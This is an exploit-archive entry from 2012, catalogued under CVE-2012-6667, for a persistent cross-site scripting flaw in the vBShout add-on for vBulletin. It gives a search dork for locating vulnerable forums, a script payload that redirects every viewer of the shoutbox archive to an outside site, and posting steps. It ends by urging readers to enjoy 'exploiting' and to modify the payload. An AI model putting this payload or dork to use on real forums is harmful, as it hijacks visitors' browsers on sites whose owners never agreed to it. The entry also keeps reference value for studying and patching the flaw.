vBShout - Persistent Cross-Site Scripting

Author: ToiL
type: webapps
platform: php
port: 
date_added: 2012-03-22 
date_updated: 2012-03-22 
verified: 1 
codes: OSVDB-80309;CVE-2012-6667 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: vBShout persistent XSS 0day

# Google Dork: "DragonByte Technologies Ltd" vbshout

# Date: 21/3/2012 9:00 PM #EST

# Author: ToiL

# Software Link: http://www.dragonbyte-tech.com/

# Version: all

# Tested on: all

# CVE : XSS

#Greeting from Team Odyessy.
#Today we will release a 0day for the vBulletin mod, vBShout.
#This 0day exploit is brought to you by www.Bugabuse.net/
#Have fun, And happy exploiting.

######Guide########


Enter
<script>top.location='https://www.bugabuse.net/';</script>
into the shoutbox
go into the archive.
Vioala. Persistent XSS exploit.
Modify to your liking.